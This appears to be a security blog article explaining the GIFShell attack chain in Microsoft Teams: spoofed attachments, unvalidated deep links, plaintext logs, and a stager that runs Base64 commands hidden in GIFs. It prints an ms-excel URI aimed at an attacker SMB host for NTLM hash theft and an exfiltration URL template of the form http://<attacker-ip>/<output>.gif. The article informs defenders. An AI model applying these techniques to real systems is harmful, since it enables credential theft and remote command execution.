How the GIFShell Vulnerability Works in Microsoft Teams

Poisonous GIFs: How the GIFShell Vulnerability Works

Attempts to hide malicious content in ordinary image files have been made for a long time, and some of them have even been successful. Recently, BleepingComputer published a report about a new vulnerability that allows attackers to launch a reverse shell in Microsoft Teams using regular GIF files. Let’s take a look at how it works.

Malware Hidden in Images

When we talk about embedding malicious code in image files, we often recall droppers that extract trojan binaries from images saved on disk, or other malware that searches for control commands in images hosted on remote servers. The new attack vector, called GIFShell, is similar to the latter. It allows cybercriminals to exploit weaknesses in the Microsoft Teams platform to launch a reverse shell and execute malicious commands on a compromised computer—all with the help of seemingly ordinary GIF files.

How GIFShell Works

GIFShell isn’t a single vulnerability, but rather a chain of attacks that exploit several flaws in the architecture of Microsoft Teams. In total, seven vulnerabilities were discovered and systematized by independent cybersecurity expert Bobby Rauch. For example, Microsoft Teams users can send each other attachments, and these attachments can load content from external URLs, not just internal SharePoint links. These files may look harmless but can contain nasty surprises. Users have no way to check in advance if an attachment is malicious.

Additionally, Microsoft Teams allows users to upload GIF images from remote servers and send GIF files encoded in HTML Base64, without checking their contents. This means malicious commands can be hidden inside such files. The platform also supports unsafe URI schemes, which can be used to steal SMB NTLM hashes or perform NTLM Relay attacks. Finally, all Microsoft Teams traffic is routed through Microsoft’s servers, making it appear legitimate to antivirus software and thus go undetected. All of this opens up interesting opportunities for hackers.

Sending Malicious Files Across Teams

For security reasons, Microsoft Teams users from one group cannot directly exchange files with members of other groups. The attachment button is missing when messaging someone from another team. However, simple messages can still be sent—and many administrators don’t realize that, by default, Teams users can receive messages from anyone.

When a message with an attachment is sent to a user in the same group, Teams generates a SharePoint link to the file, which is converted to JSON and sent as a POST request to a Teams endpoint. By default, only the sender and recipient can view the link. But Microsoft’s servers don’t check if the SharePoint links in the JSON body point to third-party servers, so the link can be replaced with any URL. This allows an attacker to perform a drive-by download attack. The file format can also be spoofed in the JSON—sending a DLL or EXE instead of an allowed JPEG, for example.

Intermediary servers don’t check this parameter either: the recipient will see a JPEG image attached, but without a preview. If the user hovers over the attachment, the file name will be shown, such as Christmas_Party_Photo.jpeg, even if the actual file is named Christmas_Party_Photo.jpeg.............exe.

Because Teams’ JSON messages lack CSRF protection, an attacker can easily automate the sending of malicious messages, for example using a Python module, bypassing Microsoft’s restrictions.

Deep Linking and Unsafe URIs

Microsoft Teams supports deep linking, allowing users to exchange links that trigger certain actions in Teams. For example, to send a chat link, you can use:

msteams://l/chat/0/0?users=<email>

Interestingly, Microsoft’s servers don’t validate deep linking URLs, so almost any URI can be included in a message. For example, a link that downloads a file from an attacker’s site and opens it in Excel on the victim’s machine:

ms-excel:/ofv|u|//10.10.10.10/ROPNOP/filename.xls

When a user opens such a link, SMB handshake data is sent to the attacker’s machine, allowing them to intercept the NTLM hash and relay it to a domain controller.

Teams Log Files: A Goldmine for Attackers

Another boon for hackers is that Microsoft Teams log files, which record all messages and their contents, are stored in plain text on the user’s computer. No admin rights are needed to read these files. For example, in the work or school version of Teams, logs are stored in:

$HOME\AppData\Roaming\Microsoft\Teams\IndexedDB\https_teams.microsoft.com_0.indexeddb.leveldb\*.log

Any malware on the device can access these logs without restriction.

Executing the GIFShell Attack

To successfully execute a GIFShell attack, the attacker first needs to use social engineering to convince the victim to run a malicious stager on their machine. This can be sent as a seemingly harmless JPEG file by modifying the JSON responsible for attachments (as described above) or via a deep linking URL. A proof-of-concept stager is available on Bobby Rauch’s GitHub. The author used Python and PowerShell, but similar programs can be written in any language.

Next, the attacker sends the victim Base64-encoded GIF files containing the desired system commands. These GIFs appear as normal images in Teams and are saved to the log file along with the message. The stager on the victim’s computer scans the logs, finds GIF/Base64 images, decodes them, and executes the hidden Base64 commands using PowerShell.

Half the job is done: the attacker has executed a command on the victim’s computer. But they also need to receive the command output. To do this, the stager monitors command execution and then creates a URL like http://<attacker-ip>/<base64-encoded-command-output>.gif, where attacker-ip is the attacker’s server and base64-encoded-command-output is the Base64-encoded output. This URL is packed into a Microsoft Teams “poll card” (a JSON message) and sent to the Teams servers.

When the Microsoft server receives this card, it contacts the attacker’s node (using the IP in the URL) and tries to download the GIF file. The file name contains the Base64-encoded command output, which the attacker can decode. For example, a file named dGhlIHVzZXIgaXM6IA0KYm9iYnlyYXVjaDYyNzRcYm9iYnlyYXVJa0K.gif decodes to the output of the whoami command run on the victim’s device:

the user is: 
bobbyrauch6274\bobbyrauIkBáë

This convoluted method creates an effective reverse shell, as demonstrated in the author’s video.

Attackers can send the victim many GIF images containing commands and receive information about their execution. Since all this data passes through Microsoft Teams servers and looks like normal app traffic, antivirus and firewalls don’t block or filter it, giving attackers free rein. And since Teams runs as a background process, the user doesn’t even need to open the app window for malicious commands to execute on their computer.

Microsoft’s Response and User Recommendations

Bobby Rauch informed Microsoft about these vulnerabilities in May and June 2022, but the company did not consider them critical, allowing the researcher to publish his findings. All the described attacks worked on Microsoft Teams version 1.5.00.11163 and are guaranteed to work on earlier versions. BleepingComputer’s administrators contacted Microsoft for comments on fixing these vulnerabilities and received the following response: “Some vulnerabilities of low severity that do not pose an immediate threat to users are not prioritized for immediate security updates, but the possibility of fixing them will be considered in a future software version.”

In other words, Microsoft is in no hurry to fix these security issues, so attackers may continue to exploit them. Therefore, Microsoft Teams users should be especially cautious and vigilant if they want to avoid falling victim to hackers.

Leave a Reply